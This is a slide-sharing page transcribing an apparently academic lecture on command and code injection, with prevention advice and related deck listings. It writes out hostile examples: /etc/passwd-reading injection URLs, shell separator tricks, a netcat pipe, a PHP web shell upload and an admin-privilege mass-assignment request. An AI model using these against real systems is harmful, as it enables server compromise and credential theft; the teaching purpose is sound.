a1 part 1 injection command and code injection a1
play

A1 (Part 1): Injection Command and Code injection A1 Injection - PowerPoint PPT Presentation

Aug 16, 2022 •235 likes •377 views

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application into executing commands or code embedded in data Data and code mixing! Often injected into interpreters SQL, PHP, Python, JavaScript, LDAP,

  1. A1 (Part 1): Injection Command and Code injection

  2. A1 – Injection  Tricking an application into executing commands or code embedded in data  Data and code mixing!  Often injected into interpreters  SQL, PHP, Python, JavaScript, LDAP, /bin/sh  Still widely prevalent  Impact severe  Entire database and schema can be read or modified  Account access and even OS level access possible

  3. A1 – Injection vulnerability  Shared underlying problem: Breaking syntax  Breaking the syntax of a PHP, Python, or JavaScript script, in order to inject OS commands or rogue script/program code  Breaking the syntax of an SQL statement, in order to inject SQL code. (SQL Injection)  Breaking the syntax of an HTML page, in order to inject JavaScript code (Cross-Site Scripting).  Fuzz site with different characters and look for interpreter errors

  4. Command injection  Most web servers run on Linux/Unix  Web application code can drop into a shell to execute commands  From PHP system() , eval() or Python os.system() , eval()  If eval() or system() call in code uses any untrusted or unvalidated input (i.e. input that adversary controls), command injection can occur  Example exploitations  Run arbitrary commands directly  Interactive shell ( /bin/sh ) or reverse-shell ( nc )  Access sensitive files via commands cat or grep  On Linux, /etc/passwd /etc/shadow  In natas, / etc/natas_webpass

  5. Example: Command injection <?php $cmd = "echo " . $_GET['name']; system($cmd); ?> http://foo.com/echo.php?name=foo  What might this URL do?  http://foo.com/echo.php?name=foo; cat/etc/passwd  Potential solution: filter all semi-colons!  Is it that simple?  Linux command-line injection syntactical techniques  Semicolons cd /etc; cat passwd  Backticks `ls`  Pipes ls | nc – l 8080  Logical expressions ls && cat /etc/passwd  Subshells (cd /tmp; tar xpf foo.tar) echo $(cat /etc/passwd)

  6. Code injection  Similar to command injection, but injecting into program itself  Pattern [CODE] [SEPARATOR] [USER INPUT] [SEPARATOR] [CODE]  where [USER INPUT] is from adversary  Use [USER INPUT] to inject arbitrary code  Break syntax by injecting a [SEPARATOR]  Inject [MALICIOUS_CODE], then inject either  A [SEPARATOR] to fix syntax [CODE][SEPARATOR][SEPARATOR][MALICIOUS_CODE][SEPARATOR][SEPARATOR][CODE]  Or a [COMMENT] to remove rest of line [CODE][SEPARATOR][SEPARATOR][MALICIOUS_CODE][COMMENT] [SEPARATOR][CODE]  Separator dependent upon context of injection (HTML, SQL, PHP)  Often a single-quote, a double-quote, a backtick, or a semi-colon ‘ “ ` ;  Comment characters also dependent upon context of injection -- # //  Inject each and observe responses to detect if injection possible https://github.com/minimaxir/big-list-of-naughty-strings

  7. Example: Detecting code injection  PHP  Inject comment /* random number */  If random number does not appear, code injection has occurred  Inject comment //  If rest of the line in program is removed, a program error is likely  Inject string concatenation to break and reform syntax " . "ha"."cker"."  If hacker string appears, code injection has occurred  Inject sleep commands sleep(10)  If delay observed, code injection has occurred  Can then inject calls to system() or other code that is then eval’d

  8. Example: Code injection via Upload  HTTP PUT or POST method that creates a file on server (e.g. image upload)  WFP1: File Upload  Upload malicious scripts and that are subsequently accessed by adversary  Example web shell $ nc victim 80 PUT /upload.php HTTP/1.0 Content-type: text.html Content-length: 130 <?php if (isset ($_GET[‘ cmd ’])) { $cmd = $_GET[‘ cmd ’]; echo ‘<pre>’; $result = shell_exec($cmd); echo $result; echo ‘</pre>’; } ?>

  9. Example: Code injection via form data  Form data used directly to set web application variables dangerous  Never perform automatic request to object mapping to  Set program variables directly  Set database entries directly  Example: user[name]=louis&user[group]=1  Intended to create user array and set attribute name set to ‘ louis ’ and attribute group to 1  Can be exploited.  Add user[admin]=1 to the request and see if your user gets administrator privileges.

  10. A1 (Part 1): Prevention

  11. Input validation and encoding  Filtering  Remove all code tags from user-input before using  Encoding  Encode all user input before passing it to an interpreter or eval statement  All characters that would break syntax of target interpreter are encoded into something innocuous  Based on language of interpreter

  12. Lower privileges  Run web-server with reduced privilege levels  Sandbox execution  chroot, BSD jails, Linux seccomp, containers (e.g. LXC, Docker)  Run server in a Virtual Machine

  13. Labs  See handout  No regular HW

  14. Questions  https://sayat.me/wu4f

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Overviewtrated Account Summary Account: Account: &quot;SELECT

445 views • 32 slides
5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring

5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring

5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring Term 2016 Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 1 Table of Contents Injection in PHP

995 views • 73 slides
A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks databases into reveal l information by way of the success or failure of injected querie ies Analogous example le: Login prompt that stops ps

602 views • 14 slides
Blackout: What Really Happened Jamie Butler and Kris Kendall Outline Code Injection Basics

Blackout: What Really Happened Jamie Butler and Kris Kendall Outline Code Injection Basics

Blackout: What Really Happened Jamie Butler and Kris Kendall Outline Code Injection Basics User Mode Injection Techniques Example Malware Implementations Kernel Mode Injection Techniques Advanced Code Injection Detection via

901 views • 60 slides
VOTD: OS Command Injection Engineering Secure Software Last Revised: September 17, 2020

VOTD: OS Command Injection Engineering Secure Software Last Revised: September 17, 2020

VOTD: OS Command Injection Engineering Secure Software Last Revised: September 17, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 What is OS Command Injection Executing arbitrary commands on the host OS via a vulnerable

272 views • 8 slides
Injection mismatch type of injection mismatch will lead to an emittance blow-up. Off axis

Injection mismatch type of injection mismatch will lead to an emittance blow-up. Off axis

Injection mismatch: As a rule, proton/ion accelerators need their full aperture at injection, thus avoiding mismatch allows a beam of larger normalized emittance * and containing more Protons. In proton/ion ring accelerators any Injection

454 views • 4 slides
INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

TECHNOLOGY APPLICATIONS FOR HYDRO ISOLATION AND REPAIR OF UNDERGROUND FACILITIES INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible mass of mineral origin, for both dry and wet surfaces solvent-free,

487 views • 21 slides
INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

TECHNOLOGY APPLICATIONS FOR HYDRO ISOLATION AND REPAIR OF UNDERGROUND FACILITIES INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible mass of mineral origin, for both dry and wet surfaces solvent-free,

466 views • 29 slides
Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D.

Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D.

Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D. Keromytis Columbia University Vassilis Prevelakis Drexel University 1 Overview of Technique Protect from code-injection attacks create

608 views • 19 slides
Security Psychology Topics Weve Covered Ethics XSS CSRF SQL injection

Security Psychology Topics Weve Covered Ethics XSS CSRF SQL injection

Security Psychology Topics Weve Covered Ethics XSS CSRF SQL injection Passwords Command injection Scanning Malware Most of these attacks are enabled by social engineering. Todays Class Pretexting

516 views • 26 slides
Injection Safety Every Provider s Responsibility Outline Safe Injection

Injection Safety Every Provider s Responsibility Outline Safe Injection

Injection Safety Every Provider s Responsibility Outline Safe Injection Practices The ONE and ONLY Campaign Outbreak History Mistaken Beliefs A Call to Action Resources and Information

591 views • 20 slides
COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS A story about how TCL interpretation works in

COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS A story about how TCL interpretation works in

COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS A story about how TCL interpretation works in F5 iRules and how it can be detected or exploited WHOAMI AND THANKS Big thanks to my fellow researchers Jesper Blomstrm Pasi Saarinen

679 views • 47 slides
SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request forgery Code Injection Attacks Attacker executes arbitrary code on server Programming the program Not sanitizing user

287 views • 11 slides
RD53A injection capacitor measurement results &amp; RD53A pixel hit delay measurement results

RD53A injection capacitor measurement results &amp; RD53A pixel hit delay measurement results

RD53A injection capacitor measurement results &amp; RD53A pixel hit delay measurement results 2/02/2018 Magne Lauritzen Part 1 Injection capacitor measurement Goal Measure capacitance of the injection capacitors that are present on

423 views • 16 slides
Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and

Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and

Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS What is all about? New code-injection attacks or return-to-libc attacks in the web

666 views • 48 slides
Playing with ptrace() for fun and profit Injection de code sous GNU/Linux Nicolas Bareil

Playing with ptrace() for fun and profit Injection de code sous GNU/Linux Nicolas Bareil

ptrace() Injection de code Applications pratiques Playing with ptrace() for fun and profit Injection de code sous GNU/Linux Nicolas Bareil nicolas.bareil@eads.net EADS Corporate Research Center - DCR/STI/C SSI Lab SSTIC 2006 Nicolas Bareil

1.25k views • 44 slides
Robust Probabilistic Fake Packet Injection for Receiver-Location Privacy Ruben Rios 1 , Jorge

Robust Probabilistic Fake Packet Injection for Receiver-Location Privacy Ruben Rios 1 , Jorge

Robust Probabilistic Fake Packet Injection for Receiver-Location Privacy Ruben Rios 1 , Jorge Cuellar 2 , Javier Lopez 1 1 NICS Lab University of Mlaga 2 Siemens AG, Munich E SORI CS 2012 10-14 Se pt. Pisa (I ta ly)

432 views • 25 slides
Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo

Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo

PHP Aspis: Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo Migliavacca, Peter Pietzuch Department of Computing, Imperial College London USENIX WebApps 2011 Portland, OR, USA Injection

763 views • 47 slides
Cyber Moving Targets Yashar Dehkan Asl Introduction An overview of different cyber moving target

Cyber Moving Targets Yashar Dehkan Asl Introduction An overview of different cyber moving target

Cyber Moving Targets Yashar Dehkan Asl Introduction An overview of different cyber moving target techniques, their threat models, and their technical details. Cyber moving target technique: Defend a system Increase the complexity of cyber

442 views • 40 slides
Survey of Cyber Moving Targets Second Edition Authors: B.C. Ward S.R. Gomez R.W. Skowyra D.

Survey of Cyber Moving Targets Second Edition Authors: B.C. Ward S.R. Gomez R.W. Skowyra D.

Survey of Cyber Moving Targets Second Edition Authors: B.C. Ward S.R. Gomez R.W. Skowyra D. Bigelow J.N. Martin J.W. Landry H. Okhravi Presenter: Jinghui Liao Outline Cyber Kill Chain Attack technique Moving-targets technique

562 views • 37 slides
Morales 1 , 2 Hetor Garia Brue 2 Redaelli 2 tino 2 Ro derik , Sefano , Gianlua V alen

Morales 1 , 2 Hetor Garia Brue 2 Redaelli 2 tino 2 Ro derik , Sefano , Gianlua V alen

MD1388: A tiv e Halo Con trol using narro w band exitation at injetion Morales 1 , 2 Hetor Garia Brue 2 Redaelli 2 tino 2 Ro derik , Sefano , Gianlua V alen , h 2 agner 2 Xu 2 Daniel V alu , Jos hk a W , C.

190 views • 7 slides
NO SQL! NO INJECTION? A talk on the state of NoSQL security IBM Cyber Security Center of IBM

NO SQL! NO INJECTION? A talk on the state of NoSQL security IBM Cyber Security Center of IBM

NO SQL! NO INJECTION? A talk on the state of NoSQL security IBM Cyber Security Center of IBM AppScan Excellence Aviv Ron Emanuel Bronshtein Alexandra Shulman-Peleg IBM Security Systems Cyber Center of Excellence AVIV RON Security

452 views • 27 slides
Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Software and Web Security 2 Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for now) sws2 1 Recall: dynamically created web pages Most web pages you see are dynamically created (except for instance

1k views • 64 slides
Pure In-Memory (Shell)Code Injection In Linux Userland DeepSec18, Vienna, Austria Disclaimer

Pure In-Memory (Shell)Code Injection In Linux Userland DeepSec18, Vienna, Austria Disclaimer

Pure In-Memory (Shell)Code Injection In Linux Userland DeepSec18, Vienna, Austria Disclaimer The views and opinions expressed in this presentation are those of the author and do not necessarily represent offjcial policy or position of my

510 views • 36 slides

More recommend